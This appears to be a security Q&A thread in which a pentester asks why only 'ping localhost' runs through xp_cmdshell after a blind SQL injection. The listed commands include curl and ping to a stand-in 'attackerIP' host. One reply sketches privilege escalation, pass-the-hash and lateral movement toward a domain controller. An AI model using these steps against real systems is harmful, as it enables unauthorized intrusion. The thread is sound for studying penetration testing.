xp_cmdshell as dbo user only able to run 'ping localhost' to verify RCE?
I am currently doing a pentest on a client's asp web application and I have identified a blind SQL injection. However, after enabling xp_cmdshell, I am only able to run the ping localhost command to verify the RCE.
I managed to enable xp_cmdshell and run the ping localhost command which has a 3 second delay. I also tried to run ping -n 10 localhost and it has a ~10s delay as well. I am fairly certain that there is a RCE here but I cant seem to run other commands such as:

mkdir C:\Windows\Temp\pwned
mkdir C:\inetpub\wwwroot\pwned
del C:\Windows\Temp\randomFile
move C:\Windows\Temp\randomFile C:\Windows\Temp\randomFile2
curl http://attackerIP:80 (blocked by firewall)
ping attackerIP (blocked by firewall)

I also managed to extract the username using the SELECT CURRENT_USER; command using the blind SQL vulnerability and it is dbo. The database version is MSSQL 2006. What are some possible reasons that I am only able to run the ping localhost command and not others?
Thanks!

If you found an sql injection what does it matter what you can do with it exactly, the important part is that it exists

SQL Server service account has fairly limited permissions, especially on the file system, it's not an admin. You could try to elevate to admin using some other exploit. Start by getting the build version using the ver command, then analyze that for unpatched exploits. Check if the SQL service account is a domain user or gMSA, then maybe you can use some NTLM PassTheHash crack to get its password, then you could authenticate using that hash on other machines. If you can move laterally to a Domain Controller then you've probably compromised the whole domain.

SQL Server 2006? I'll bite... what's the output of SELECT @@VERSION?
